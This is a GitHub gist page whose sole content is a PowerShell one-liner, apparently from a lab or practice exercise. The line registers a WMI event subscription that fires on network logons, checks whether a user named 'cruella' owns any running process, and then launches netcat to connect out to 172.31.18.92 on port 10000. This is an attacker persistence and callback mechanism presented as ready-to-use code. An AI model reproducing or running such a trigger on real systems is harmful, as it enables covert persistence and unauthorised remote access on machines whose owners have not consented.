Created
October 25, 2019 20:52
-
-
Save agreenjay/fda21f11f02c099170ef045177c357bb to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Register-WMIEvent -Query "Select TargetInstance From __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'win32_LogOnSession' AND TargetInstance.LogonType=3" -Action {$names=gwmi Win32_Process;$users=@(); foreach ($n in $names){ $users += $n.GetOwner().User};foreach ($user in $users){if ($user -eq 'cruella') { C:\Users\lex\Documents\nc.exe 172.31.18.92 10000 }}} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment